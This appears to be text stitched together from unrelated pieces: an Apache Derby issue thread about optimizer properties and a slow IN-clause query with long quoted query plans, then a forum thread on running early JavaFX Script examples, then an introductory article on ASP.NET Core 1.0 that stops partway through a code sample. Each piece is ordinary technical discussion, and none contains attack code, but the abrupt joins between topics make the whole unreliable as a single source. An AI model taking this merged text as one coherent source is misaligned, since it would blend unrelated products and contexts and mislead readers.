> 1. shall I open a new issue for the test failure?
Yes, I think that'd be good. Note though that this is an actual engine bug, not just a test problem. So it'd be good to make that clear in the new issue. The test case can serve as a repro for the engine bug.
> 2. should I add the other two properties to the new test run?
First I should mention that the full list of properties for this test includes:
derby.infolog.append=true
derby.optimizer.optimizeJoinOrder=false
derby.optimizer.noTimeout=true
derby.optimizer.ruleBasedOptimization=true
derby.language.statementCacheSize=1000
As for which of these are required, ummm....I don't know. My assumption is that the properties were added for specific reasons, but without corresponding comments it's hard to tell. Generally speaking any test for which we need to verify all or part of a query plan uses "noTimeout=true" to ensure that we get the same plan regardless of platform or machine speed. So it might be worth it to keep that one. But it'll have to be your call for the rest of them...
> I'm not clear on what the ruleBasedOptimization flag does. Does that instruct the optimizer to not attempt the normal
> cost-based optimization and only do some rule-based optimization?
Yes, that's exactly what it does. But that said, I know practically nothing about rule-based optimization, and I don't know why that particular property was added for the old distinct.sql test. Maybe you can do some investigating there to figure it out... and if not... well, like I said, it's your call.
Army> Note though that this is an actual engine bug, not just a test problem. So it'd be good to make that clear in the new issue.
Agreed. I have a (bad?) tendency to overload JIRA issues by fixing everything that comes along whilst working on that one issue. Opened
DERBY-2500 for this new one.
As for the other properties you listed, I can't see how any of those would affect how the test runs, with the exception of noTimeout and ruleBasedOptimization, since they might affect the query plans in the runtime statistics. But, since the tests complete in a reasonable amount of time with noTimeout=true I'll leave that in, and since all the tests pass with or without ruleBasedOptimization set to true, I'll leave that off. Not really worth investigating, since it seems to have no effect on the new test.
The issue filed by Andrew (
DERBY-2500) has been resolved with no apparent fallout. I have also filed several Jiras for follow-up enhancements that can be done in the future, namely DERBY-2482, DERBY-2483, and DERBY-2503.
As I have not heard anything (good nor bad) from the people "watching" this issue, and since other Jiras exist for related work, I think we should be able to close this issue now.
Sunitha, if you agree can you mark this Jira as closed?
Thanks Army for all your great work on this. Closing this issue now.
I have also found this issue to be a problem and would like to know whether there are any plans to fix it?
What follows is a copy of a discussion from the derby-users mailing list from 2005/11/11, "Poor query optimizer choices is making Derby unusable for large tables"; it describes how the same behaviour is causing problems for a query with a GROUP BY clause:
-----------------------------------------------------------------------
Hi Kevin,
Kevin Hore wrote:
>> i) Does anyone have any plans to fix this problem?
Can you file an enhancement request for this? I think Derby could
improve it's handling of OR/IN clauses. Many databases don't optimize OR
clauses as much as possible, though some do better than others. It would
be great if Derby could internally process this as two different scans
(one for 'CONTACT' and another for 'ADD') and then combine the results.
Some databases can do this. However, the workaround suggested by Jeff L.
does this, though you have to rewrite the query.
Satheesh
>> ii) In the meantime, are there any work-arounds? I'd appreciate any
>> suggestions that would decrease the execution time of my second query
>> below (the one with with two search terms). Likewise, any general
>> strategies for avoiding this problem with IN clauses would be
>> appreciated.
>>
>>
>> --- PROBLEM DESCRIPTION ---
>>
>> Consider the table:
>>
>> CREATE TABLE tblSearchDictionary
>> (
>> ObjectId int NOT NULL,
>> ObjectType int NOT NULL,
>> Word VARCHAR(64) NOT NULL,
>> WordLocation int NOT NULL,
>> CONSTRAINT CONSd0e222 UNIQUE (ObjectId,ObjectType,Word,WordLocation)
>> );
>>
>> This table has an index on each of the four columns, it also has the
>> unique index across all four columns as defined above:
>>
>> CREATE INDEX tblSearchDictionaryObjectId ON tblSearchDictionary
>> (ObjectId);
>> CREATE INDEX tblSearchDictionaryObjectType ON tblSearchDictionary
>> (ObjectType);
>> CREATE INDEX tblSearchDictionaryWord ON tblSearchDictionary (Word);
>> CREATE INDEX tblSearchDictionaryWordLocation ON tblSearchDictionary
>> (WordLocation);
>>
>> The table contains about 260,000 rows.
>>
>> The following query selects all rows that match instances of string in
>> the Word column. It sums the WordLocation column having grouped by the
>> ObjectId column.
>>
>> SELECT ObjectId, SUM(WordLocation) AS Score
>> FROM tblSearchDictionary
>> WHERE Word = 'CONTACT'
>> GROUP BY ObjectId;
>>
>> On my machine this will usually complete in an acceptable time of
>> around 200ms.
>>
>> Now consider the following query which adds a second search term on
>> the same column.
>>
>> SELECT ObjectId, SUM(WordLocation) AS Score
>> FROM tblSearchDictionary
>> WHERE Word IN ('CONTACT', 'ADD')
>> GROUP BY ObjectId;
>>
>> This second query usually takes around 10000ms on my machine. My
>> understanding from the Derby optimizer docs and
DERBY-47 is that this
>> is because Derby is re-writing the query along the following lines,
>> and then choosing to do a table scan:
>>
>> SELECT ObjectId, SUM(WordLocation) AS Score
>> FROM tblSearchDictionary
>> WHERE
>> Word IN ('CONTACT', 'ADD')
>> AND Word >= 'ADD'
>> AND Word <= 'CONTACT'
>> GROUP BY ObjectId;
>>
>> The plan for the first query indicates that the tblSearchDictionaryWord
>> index is used to perform an index scan. However, the plan for the second
>> query indicates that the majority of the additional time is taken
>> performing a table scan over the entire table, instead of making use of
>> the indexes available. Our application uses IN quite frequently, so
>> this optimizer behaviour would seem to present a significant problem.
>>
>> --- QUERY PLAN FOR FIRST QUERY ---
>>
>> Statement Name:
>> null
>> Statement Text:
>> SELECT ObjectId,
>> SUM(WordLocation) AS Score
>> FROM tblSearchDictionary
>> WHERE
>> Word = 'CONTACT'
>> GROUP BY
>> ObjectId
>>
>> Parse Time: 0
>> Bind Time: 0
>> Optimize Time: 16
>> Generate Time: 0
>> Compile Time: 16
>> Execute Time: 0
>> Begin Compilation Timestamp : 2005-11-11 12:28:52.765
>> End Compilation Timestamp : 2005-11-11 12:28:52.781
>> Begin Execution Timestamp : 2005-11-11 13:08:15.406
>> End Execution Timestamp : 2005-11-11 13:08:15.406
>> Statement Execution Plan Text:
>> Project-Restrict ResultSet (5):
>> Number of opens = 1
>> Rows seen = 93
>> Rows filtered = 0
>> restriction = false
>> projection = true
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> restriction time (milliseconds) = 0
>> projection time (milliseconds) = 0
>> optimizer estimated row count: 1.00
>> optimizer estimated cost: 226.00
>>
>> Source result set:
>> Grouped Aggregate ResultSet:
>> Number of opens = 1
>> Rows input = 113
>> Has distinct aggregate = false
>> In sorted order = false
>> Sort information:
>> Number of rows input=113
>> Number of rows output=93
>> Sort type=internal
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> optimizer estimated row count: 1.00
>> optimizer estimated cost: 226.00
>>
>> Source result set:
>> Project-Restrict ResultSet (4):
>> Number of opens = 1
>> Rows seen = 113
>> Rows filtered = 0
>> restriction = false
>> projection = true
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> restriction time (milliseconds) = 0
>> projection time (milliseconds) = 0
>> optimizer estimated row count: 118.00
>> optimizer estimated cost: 226.00
>>
>> Source result set:
>> Index Row to Base Row ResultSet for TBLSEARCHDICTIONARY:
>> Number of opens = 1
>> Rows seen = 113
>> Columns accessed from heap =
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> optimizer estimated row count: 118.00
>> optimizer estimated cost: 226.00
>>
>> Index Scan ResultSet for TBLSEARCHDICTIONARY using index
>> TBLSEARCHDICTIONARYWORD at read committed isolation level using share
>> row locking chosen by the optimizer
>> Number of opens = 1
>> Rows seen = 113
>> Rows filtered = 0
>> Fetch Size = 1
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> next time in milliseconds/row = 0
>>
>> scan information:
>> Bit set of columns fetched=All
>> Number of columns fetched=2
>> Number of deleted rows visited=0
>> Number of pages visited=4
>> Number of rows qualified=113
>> Number of rows visited=114
>> Scan type=btree
>> Tree height=3
>> start position:
>> >= on first 1 column(s).
>> Ordered null semantics on the following columns:
>> 0
>> stop position:
>> > on first 1 column(s).
>> Ordered null semantics on the following columns:
>> 0
>> qualifiers:
>> None
>> optimizer estimated row count: 118.00
>> optimizer estimated cost: 226.00
>>
>>
>> --- QUERY PLAN FOR SECOND QUERY ---
>>
>> Statement Name:
>> null
>> Statement Text:
>> SELECT ObjectId,
>> SUM(WordLocation) AS Score
>> FROM tblSearchDictionary
>> WHERE
>> Word IN ('CONTACT', 'ADD')
>> GROUP BY
>> ObjectId
>>
>> Parse Time: 0
>> Bind Time: 0
>> Optimize Time: 0
>> Generate Time: 15
>> Compile Time: 15
>> Execute Time: 4250
>> Begin Compilation Timestamp : 2005-11-11 13:16:17.578
>> End Compilation Timestamp : 2005-11-11 13:16:17.593
>> Begin Execution Timestamp : 2005-11-11 13:16:17.593
>> End Execution Timestamp : 2005-11-11 13:16:27.437
>> Statement Execution Plan Text:
>> Project-Restrict ResultSet (5):
>> Number of opens = 1
>> Rows seen = 100
>> Rows filtered = 0
>> restriction = false
>> projection = true
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 4250
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> restriction time (milliseconds) = 0
>> projection time (milliseconds) = 0
>> optimizer estimated row count: 1.00
>> optimizer estimated cost: 82959.49
>>
>> Source result set:
>> Grouped Aggregate ResultSet:
>> Number of opens = 1
>> Rows input = 712
>> Has distinct aggregate = false
>> In sorted order = false
>> Sort information:
>> Number of rows input=712
>> Number of rows output=593
>> Sort type=internal
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 4250
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> optimizer estimated row count: 1.00
>> optimizer estimated cost: 82959.49
>>
>> Source result set:
>> Project-Restrict ResultSet (4):
>> Number of opens = 1
>> Rows seen = 712
>> Rows filtered = 0
>> restriction = false
>> projection = true
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 4219
>> close time (milliseconds) = 15
>> restriction time (milliseconds) = 0
>> projection time (milliseconds) = 0
>> optimizer estimated row count: 19200.45
>> optimizer estimated cost: 82959.49
>>
>> Source result set:
>> Project-Restrict ResultSet (3):
>> Number of opens = 1
>> Rows seen = 40806
>> Rows filtered = 40094
>> restriction = true
>> projection = false
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 4219
>> close time (milliseconds) = 15
>> restriction time (milliseconds) = 124
>> projection time (milliseconds) = 0
>> optimizer estimated row count: 19200.45
>> optimizer estimated cost: 82959.49
>>
>> Source result set:
>> Table Scan ResultSet for TBLSEARCHDICTIONARY at read
>> committed
>> isolation level using share row locking chosen by the optimizer
>> Number of opens = 1
>> Rows seen = 40806
>> Rows filtered = 0
>> Fetch Size = 1
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 4001
>> close time (milliseconds) = 15
>> next time in milliseconds/row = 0
>>
>> scan information:
>> Bit set of columns fetched=
>> Number of columns fetched=3
>> Number of pages visited=2978
>> Number of rows qualified=40806
>> Number of rows visited=256001
>> Scan type=heap
>> start position:
>> null
>> stop position:
>> null
>> qualifiers:
>> Column[0][0] Id: 2
>> Operator: <
>> Ordered nulls: false
>> Unknown return value: true
>> Negate comparison result: true
>> Column[0][1] Id: 2
>> Operator: <=
>> Ordered nulls: false
>> Unknown return value: false
>> Negate comparison result: false
>>
>> optimizer estimated row count: 19200.45
>> optimizer estimated cost: 82959.49
>>
>> ----------
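For reference, plan output like the quoted text above is produced by Derby when runtime statistics are switched on in the connection. A sketch using Derby's documented SYSCS_UTIL procedures (the table and column names are taken from the post):

```sql
-- Run from ij, in the same connection as the query:
CALL SYSCS_UTIL.SYSCS_SET_RUNTIMESTATISTICS(1);
CALL SYSCS_UTIL.SYSCS_SET_STATISTICS_TIMING(1);

SELECT ObjectId, SUM(WordLocation) AS Score
FROM tblSearchDictionary
GROUP BY ObjectId;

-- Retrieve the plan text for the statement just executed:
VALUES SYSCS_UTIL.SYSCS_GET_RUNTIMESTATISTICS();
```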
>>
>> Thanks in advance for any help!
>>
>> Kind regards,
>>
>>
>> Kevin Hore
>>
>>
>> | https://issues.apache.org/jira/browse/DERBY-47 | CC-MAIN-2015-48 | refinedweb | 18,820 | 60.14 |
The Making of the Interactive Treehouse Ad
The Idea
- Have a "canvas" (not <canvas>, just an area where things happen)
- Have a series of five bits of simple jQuery code
- Click a button, code runs, something happens in canvas
- You can see the code you are about to execute
- It should be visually clear the code you see is what is running and making the changes
- The whole time, the canvas area is a clickable ad for Treehouse (users aren't required to interact with the jQuery stuff, it's still just an ad)
- You can start over with the interactive steps when completed
Here's what we end up with. Demo on CodePen:
The HTML
Relevant bits commented:
<div class="ad"> <!-- Our jQuery code will run on elements in here -->
  <div class="canvas" id="canvas">
    <a id="treehouse-ad" href="" target="_blank">Team Treehouse!</a>
    <img src="">
  </div>
</div>
The CSS
The JavaScript
Now we need to make this thing work. Which means...
- When button is clicked...
- Execute the code
- Increment the step
- If it's the last step, put stuff in place to start over
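The bullets above can be sketched as a tiny step runner. The names and toy steps here are mine, not the ad's actual source; in the real ad each run() would be jQuery code acting on the canvas:

```javascript
// A step holds the code text to display and a run() that executes it.
function makeStepRunner(steps) {
  var current = 0;
  return {
    run: function () {
      if (current >= steps.length) current = 0; // finished? start over
      var result = steps[current].run();        // execute this step's code
      current += 1;                             // increment the step
      return result;
    },
    stepIndex: function () { return current; }
  };
}

// Two toy steps standing in for the five jQuery snippets:
var runner = makeStepRunner([
  { text: "$('a').addClass('button');", run: function () { return 'button added'; } },
  { text: "$('a').animate({ top: '-=10' });", run: function () { return 'moved up'; } }
]);
```

Wiring runner.run() to the button's click handler (with e.preventDefault()) is all that remains.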
The Structure
The "Steps"
We'll have five steps. As in, the different bits of jQuery that execute and do different things to our ad canvas.
- Add a "button" class to the link
- Move it up a little bit (demonstrating animation)
- Change the text of the button
- Add a new element
- Add class to the entire ad, giving it a finished feel
We'll also need to do two things with each bit of code:
- Display it
- Execute it
The Animation
To make it visually clear what is going on when you press the "Run Code" button, I thought having the code kind of slide up and fade into the "canvas" would be a cool idea. The steps then become:
- Make a clone/duplicate code area directly on top of existing one
- Animate position upwards while fading out
- Remove clone when done
- Wait to change code text until animation has completed
The Guts
The End.
That’s brilliant! I can see people copying the same idea for their websites to interact with visitors and keep them on the site longer. And yes, I am going to try it on my site too.
Why not store the steps in the array as functions, then call .toString() on them to extract the code?
Here’s a quick sample:
Looks like a great way of handling it to me!
Coming to think of it, there’s just one problem with this solution: you can’t minify the JS.
You’ll have to maintain the function and the display text separately.
I’ve been using that sort of structure on all my JS lately, and I find it’s so much nicer.
One thing I like to do with my code, which I picked up from others, is use a “settings” object to hold any cached items and values. So, instead of just declaring a bunch of naked variables at the top, it looks something like this:
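A minimal sketch of that shape (module and setting names are made up for illustration):

```javascript
var ModuleName = {
  settings: {
    container: '#main',  // cached selectors and values live in one place
    speed: 300
  },
  init: function () {
    var s = this.settings;  // local alias instead of ModuleName.settings
    return s.container + ' @ ' + s.speed;
  }
};
```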
So, as I’ve done in the init() function, I can access any of those settings using “s.whatever”. The only flaw is that you have to define the settings at the top of each function using “this.settings”.
I don’t know if this is the best way to do this sort of thing, but I find it saves a bunch of characters, so you don’t have to do “ModuleName.variableName” every time you want a cached object.
Just be careful with that global. You want to properly declare that:
Yes, that’s right. My example was more or less theoretical. Not meant to be copy/pasted.
I usually do something like this at the top:
And along those same lines, the other code should be “var ModuleWhatever…” because that too was global as I had written it.
Well in that case, there’s no reason for s = this.settings at the beginning of each function.
Once you did that in your init function, it’ll be available throughout your module, since they all have access to the parent closure.
Yes, you’re right… Hmm, that actually makes it much easier. I think some of my old code has a few redundancies! :) Thanks for pointing that out.
Pretty cool… but then you have that global “s” which scares me. I think I’d prefer the repetitive s = this.settings; in general.
@Chris I don’t think we’re talking about polluting the global namespace here. We’ll have all this in its own closure:
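Something like this (an illustrative sketch):

```javascript
var Module = (function () {
  var s; // private to the closure; nothing here touches the global namespace
  return {
    settings: { speed: 300 },
    init: function () {
      s = this.settings; // assigned once, visible to every method in the closure
      return s.speed;
    }
  };
})();
```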
True.
I really love this ad. A lot of my job involves trying to make our advertisements more interesting and evaluating statistics about our advertisements. Your ad is interactive, it’s catchy, it’s very well targeted at the proper demographic… It’s pretty much perfect. Good job, as always. :)
I too have been structuring a lot of my javascript like this lately. Some things I hadn’t considered in there as well though. One thing that I have been fighting with lately is putting jquery in my functions/modules.
Obviously it could have no merit if I just know jquery will be there but I still for some reason have been fighting with relying on jQuery to be there or not.
I’d be interested to see the statistics for this ad. What percent go through all five steps and click the button, which go through all five but don’t click, do some stop at step 3, etc. Would be an interesting study since this form of advertisement is very unique.
Chris: Why do you need to declare e.preventDefault() in this block of code? Just curious… Thanks!
I probably have href="#" on the link so it has a proper cursor and hover state and stuff. But that href will jump to the top of the page if that line isn’t there.
That line prevents the browser from following the link in the href attribute of the a tag.
Awesome! I should have been using this for a while now ;). Thanks!
Not to be a downer on this “interactive” ad but it took me forever to even figure out what part of the ad was “Interactive” AFTER being told it was. This is due to the fact that I saw the green “treehouse” box and thought that was the ad and everything else was unrelated content. It took me a long time to read the small paragraph below the code that said it had something to do with Treehouse.
I think this is because of the dotted border around the main Treehouse ad area. It separates it, and since I’m not used to seeing interactive ads it requires a big jump for me to associate the content inside the box with the content below.
While it may be cool interaction it fails on a basic level because it takes so long to figure out that it’s somehow related to Treehouse. I’d be curious to see if the number of people interacting with the content is worth making it an interactive ad?
Thanks for the thoughts. All good stuff to consider in the future.
I feel like “Run Code” is a pretty strong verb-y button and curious folks might just click to see what it does.
It’s also kind of good that you did see the Treehouse area and just glossed over the stuff below it. It needs to be an ad first and anything else second.
Awesome as always Chris!! Thanks!
@Chris – “Run Code” can / will also scare some, already overly-cautious, users out there…. lol
@Louis – THANK YOU for bringing up the “settings” object…. I now realize that I have some redundancies to clean up as well…. hahaha…
Is there a way to protect your ports via winsock?? Sort of like ZoneAlarm does - I'm fairly new to winsock so I don't know much about it.
Is there a way to protect your ports via winsock?? Sort of like ZoneAlarm does - I'm fairly new to winsock so I don't know much about it.
I think personal firewall software attatches itself to the tcp/ip stack in some way to inspect it. Similar to some virus software with real-time scanners.
Don't ask me how it's done progmatically though, because I don't have a clue.
Lookup Layered Service Providers at MSDN
Hi, I am new to the board and winsock too.
I had the same idea for a program; the only problem is I don't know that much about winsock, so I made this last Monday. It listens on a port, and when someone connects it prints that person's IP.
I think I will keep working on it to make it work how I want it to; plus I got a Windows C++ networking ebook.
And if you put it on a port that is already being listened on, it will not work :-(
You have to include the winsock headers:
#include <winsock2.h> // winsock header; link with ws2_32.lib
#include <iostream>
using namespace std;

int main()
{
    WSADATA WD;
    WSAStartup(MAKEWORD(1, 1), &WD);

    cout << "Please enter the port you want this program to listen on" << endl;
    int port;
    cin >> port;

    SOCKET G = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    sockaddr_in tcpaddr, enemy;
    tcpaddr.sin_family = AF_INET;
    tcpaddr.sin_port = htons(port);
    tcpaddr.sin_addr.s_addr = htonl(INADDR_ANY);

    bind(G, (SOCKADDR *)&tcpaddr, sizeof(tcpaddr));
    listen(G, SOMAXCONN);

    while (1)
    {
        int A = sizeof(enemy);
        accept(G, (SOCKADDR *)&enemy, &A);
        cout << "the ip " << inet_ntoa(enemy.sin_addr)
             << " the port " << ntohs(enemy.sin_port) << endl;
    }
    return 0;
}
BlackBird, I don't think that's what he's looking for.
The 'hacker' trying to connect wouldn't be able to connect anyways unless there's a trojan or something listening on that port. If there is, then your call to bind() and listen() will fail anyways, because *surprise* that port has already been taken. Then you will be utterly helpless to do anything while the hacker proceeds to destroy your computer and burn down your house, after murdering your wife and children by programmatically unplugging them from the Matrix. | http://cboard.cprogramming.com/networking-device-communication/51092-protecting-ports-via-winsock.html | CC-MAIN-2016-22 | refinedweb | 382 | 60.04 |
Anyone tried out JavaFX?
Frank Carver (Sheriff), posted May 11, 2007 09:06
It all looks very interesting, and the demos are very impressive, but so far I have not worked out how to run my own scripts.
The tutorial provided with the code has NetBeans 5.5 as a prerequisite. I can't believe that a scripting system which is advertised as being so portable really needs NetBeans to run.
I have tried using the "bat" files in the bin directory, but they always report that they can't find my file HelloWorld.fx, even though it's right here in the current directory.
Anyone managed to run JavaFX without netbeans, yet?
Gregg Bolinger (Ranch Hand), posted May 11, 2007 10:39
I ran it with the Eclipse plugin. You have to feed the name of the script into the FXShell. So for example if you had a .fx file named HelloWorld, you might run it like the following from the command line:
java -cp path\to\fx\jar\file net.java.javafx.FXShell HelloWorld
HTH.
Frank Carver (Sheriff), posted May 11, 2007 13:44
Hmm. I'll try that method of invoking it. Thanks.
I tried the Eclipse plugin but it seems very "alpha". It gratuitously went and re-wrote the .classpath and .project files of all my other open java projects to refer to JavaFX. I had to manually revert changes to a dozen projects. Bleh.
Frank Carver (Sheriff), posted May 11, 2007 14:01
It still doesn't work, and I can't see why.
Here's a transcript:
N:\playpen>dir/w
 Volume in drive N is Data
 Volume Serial Number is E484-4863

 Directory of N:\playpen

[.]            [..]           fx.bat         HelloWorld.fx
               2 File(s)            228 bytes
               2 Dir(s)  240,336,633,856 bytes free

N:\playpen>type fx.bat
java -cp c:\java\lib\javafxrt.jar net.java.javafx.FXShell %1

N:\playpen>fx HelloWorld.fx
N:\playpen>java -cp c:\java\lib\javafxrt.jar net.java.javafx.FXShell HelloWorld
not found: HelloWorld.fx
compile thread: Thread[AWT-EventQueue-0,6,main]
compile 0.0
init: 0.032

N:\playpen>
It's clear that FXShell is running, and getting the filename parameter (it correctly adds the ".fx" to the end), but it insists that the file is not found.
HelloWorld.fx is copied directly from the tutorial:
import javafx.ui.*;

Frame {
    title: "Hello World JavaFX"
    width: 200
    height: 50
    content: Label { text: "Hello World" }
    visible: true
}
I really don't understand why the FXShell is refusing to find my script.
Frank Carver (Sheriff), posted May 11, 2007 14:10
Aha! It works. I had a flashback to 10 years ago - a classpath problem
There were two problems:
1. I needed to add "." to the classpath, apparently it is attempting to load the supplied parameter as a classpath resource rather than from the filesystem or a remote URL.
2. When I finally got it to locate the source file, it also needed the other two jars in the classpath.
So, for anyone else who wants to try this, a better bat script might be:
set LIBDIR=c:\java\lib
java -cp .;%LIBDIR%\javafxrt.jar;%LIBDIR%\Filters.jar;%LIBDIR%\swing-layout.jar net.java.javafx.FXShell %1
Ulf Dittmer (Marshal), posted May 11, 2007 15:09
import javafx.ui.*;

Frame {
    title: "Hello World JavaFX"
    width: 200
    height: 50
    content: Label { text: "Hello World" }
    visible: true
}
So that's what it looks like - CSS meets Java? This particular code snippet looks like just another notation for a regular Frame, though ... or is there something happening implicitly that would need to be done explicitly in J2SE?
Frank Carver (Sheriff), posted May 11, 2007 16:12
The quoted example is indeed just an alternative notation.
The cleverness comes when you mix behaviour into it. Here's another example from the tutorial:
import javafx.ui.*;

class HelloWorldModel {
    attribute saying: String;
}

var model = HelloWorldModel {
    saying: "Hello World"
};

var win = Frame {
    title: bind "{model.saying} JavaFX"
    width: 200
    height: 50
    content: TextField { value: bind model.saying }
    visible: true
};
This one demonstrates the use of the "bind" operation. It links (presumably using event listeners under the covers) both the frame title and the value of a text field to a value in a model object. The upshot is that when you run this (deceptively small) program, it allows you to enter a value in the text field, hit enter and it automatically updates the frame title. No other code needed.
That's beginning to get cool.
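Under the covers the runtime presumably wires up listeners, as the post suggests. Here is a rough plain-Java sketch of the behavior that bind automates (my illustration only, not how the FX runtime is actually implemented):

```java
import java.util.ArrayList;
import java.util.List;
import java.util.function.Consumer;

public class BindDemo {
    static class ObservableString {
        private String value;
        private final List<Consumer<String>> listeners = new ArrayList<>();

        ObservableString(String initial) { value = initial; }

        // Like `title: bind ...`: register and receive the current value at once
        void bind(Consumer<String> listener) {
            listeners.add(listener);
            listener.accept(value);
        }

        // Like typing in the TextField: every bound target updates automatically
        void set(String newValue) {
            value = newValue;
            for (Consumer<String> l : listeners) l.accept(newValue);
        }
    }

    public static void main(String[] args) {
        StringBuilder frameTitle = new StringBuilder();
        ObservableString saying = new ObservableString("Hello World");
        saying.bind(v -> { frameTitle.setLength(0); frameTitle.append(v).append(" JavaFX"); });
        saying.set("Howdy");               // the "title" updates by itself
        System.out.println(frameTitle);    // Howdy JavaFX
    }
}
```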
Gregg Bolinger (Ranch Hand), posted May 11, 2007 17:50
The syntax is oddly similar to Groovy, even the String manipulation.
Groovy:
var name = 'Gregg'
var message = "Hello ${name}"
JavaFX Script:
var name = 'Gregg'
var message = "Hello {name}"
And all the Swing stuff looks a lot like Groovy's SwingBuilder except for the binding elements. That is a nice feature of JavaFX scripting.
Juha Anon (Greenhorn), posted May 14, 2007 15:46
Instructions for the first step using the Eclipse plugin -- from novice to novice.
Do a Hello World
=============
After installing the plugin, you won't see any change at all in the Eclipse interface except when you create the first JavaFX file. Create a new Java Project, and then Hello.fx in the source directory:
new | other... | javaFX | JavaFX File.
(The source directories are managed exactly like you would do with Java sources.)
When you add your first .fx-file in your Java project, the JavaFX plugin knows it should be a JavaFX-project, and adds the .jar files which are needed. It also knows that the run-configuration should now utilize the FXShell as main class.
The contents of Hello.fx may be something like this:
import javafx.ui.*;
import java.lang.System;

Frame {
    content: Button {
        text: "Press Me"
        action: operation() {
            System.out.println("You pressed me");
        }
    }
    visible: true
}
You run it by right-clicking on the project (or the file you want to run) and adding a new configuration for a "JavaFX Application". It will have net.java.javafx.FXShell for Main class. You must add the name of the Hello.fx (or just the class name, "Hello") to tell the shell what to run. (Otherwise, it compiles and runs the empty set of classes without complaining: very annoying!)
The second step: run the demo application.
==============================
To run the demo application in Eclipse, you may use "demo.DemoLauncher" as the argument to the FXShell.
You must also add the "demos" directory as a source directory along with "src". You do that under Project | Properties | Java Build Path | Source. Otherwise, I didn't have to change anything from what I got from the Subversion trunk (or the source download).
There's some Red in the Source: ignore it!
==============================
There is one spot in the code that the plugin complains about, but it worked anyway. Someone will remove that eventually... I guess.
This is the place causing it:
incompatible types: expected net.java.javafx.type.ValueList, found javafx.ui.canvas.Group
in new Group {transform: translate(30, 30), content: new ViewOutline {selected: true, view: widget, rectHeight: h, rectWidth: w}}
Tutorial Project/javafxpad, JavaFXPad.fx, line 980
Juha Anon (Greenhorn), posted May 14, 2007 16:05
Eclipse is my favorite for serious work, but I would say that it's easier to start out from the demo application. There's no setup needed.
I downloaded openjfx-20070506220507.tar.gz and extracted it. Then just changed to the directory:
trunk/demos/demo
and run the command:
./demo.sh
It worked!
I haven't any classpath set. The only Java environment I have is that JAVA_HOME is set, and $JAVA_HOME/bin is in my path.
I'm running Java 1.6, but 1.5 is probably also good.
Run the tutorial, and start changing the scripts there. No need to recompile, or run! That's a small, but cute, development environment, I think.
-- Juha
Juha Anon (Greenhorn), posted May 14, 2007 16:12
I see that I was unclear when saying: You must add the name of the Hello.fx (or just the class name, "Hello") to tell the shell what to run.
I meant: set Hello as the argument (in the Arguments tab) to the FXShell.
-- Juha
This article highlights the new features and concepts in ASP.NET Core 1.0.
The new version of ASP.NET is called ASP.NET Core (a.k.a. ASP.NET 5) and it represents the most significant architectural redesign in the history of ASP.NET. This article will highlight the new features and concepts in the new ASP.NET.
ASP.NET Core 1.0 is a new open-source and cross-platform framework for building modern cloud-based web apps. It has been built from the ground up to provide an optimized development framework for web apps that are deployed either to the cloud or to your local servers. In addition, it was redesigned to make ASP.NET leaner, modular (so you can add just the features that your application requires), cross-platform (so you can easily develop and run your app on Windows, Mac or Linux, which is pretty awesome) and cloud-optimized (so you can deploy and debug apps over the cloud). (Read more here)
What does that mean for us that work on previous versions of ASP.NET?
If you are using the past versions of ASP.NET or if you are coming from a WebForms development background then you might find ASP.NET Core completely new. It's like the feeling of moving from classic ASP to the ASP.NET world or perhaps the feeling of my dog looking into my screen monitor while I am programming:
Here is the list of the most significant changes in ASP.NET Core 1.0.
For the first time in the history of ASP.NET, you can run ASP.NET Core applications on OSX and Linux. Yes, ASP.NET Core apps can run on Windows, OSX and Linux, and this fact opens up ASP.NET to an entirely new audience of developers and designers. ASP.NET Core also lets you choose between two runtime environments, giving you greater flexibility when deploying your app.
ASP.NET Core 1.0 is a refactored version of ASP.NET and runs on top of .NET Core. It was redesigned to be modular that allows developers to plug in components that are only required for your project, most features will be available as plugins via NuGet. One of the good things about being modular is the ability to upgrade features without impacting the other features that your application uses. Adding to that, .NET Core is a cross-platform runtime that enables you to deploy apps in OSX or Linux operating systems. It also is a cloud-optimized runtime that enables you to deploy and debug apps in the cloud. The .NET Core can be bin-deployed along with your app, allowing you to run ASP.NET Core apps on the same server that targets multiple versions of the .NET Core.
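For instance, features arrive as NuGet packages that you opt into per project. A hypothetical dependency section of a project.json illustrates the idea (package names are real ASP.NET Core packages, but the exact versions here are illustrative):

```json
{
  "dependencies": {
    "Microsoft.AspNetCore.Mvc": "1.0.0",
    "Microsoft.AspNetCore.StaticFiles": "1.0.0",
    "Microsoft.AspNetCore.Server.Kestrel": "1.0.0"
  }
}
```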
You can also create an ASP.NET Core app that targets Windows only and runs on the full .NET Framework.
ASP.NET 4.6 is the latest release of the full .NET Framework; it lets you utilize all available .NET components and supports backward compatibility. If you plan on migrating apps to .NET Core, you may need to make some modifications, since .NET Core is currently limited compared to the full .NET Framework.
ASP.NET Core is not all about Visual Studio. Enabling ASP.NET Core to run on Windows, OSX and Linux changes everything. For the first time, developers and designers can build ASP.NET Core apps using their favorite development environments, such as Sublime Text and WebStorm. That's pretty awesome!
If you create an empty ASP.NET Core project in Visual Studio 2015, you will be surprised to see this (unless you have never created a project with a previous version of ASP.NET):
Surprised? Yes, the new project structure is totally different. The project template is completely new and now includes the following new files:
The ConfigureServices method defines the services used by your application and the Configure method is used to define what middleware makes up your request pipeline.
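In sketch form (an illustration, not the exact generated template code):

```csharp
public class Startup
{
    // Register the services the app will use
    public void ConfigureServices(IServiceCollection services)
    {
        services.AddMvc();
    }

    // Compose the middleware that makes up the request pipeline
    public void Configure(IApplicationBuilder app)
    {
        app.UseStaticFiles();
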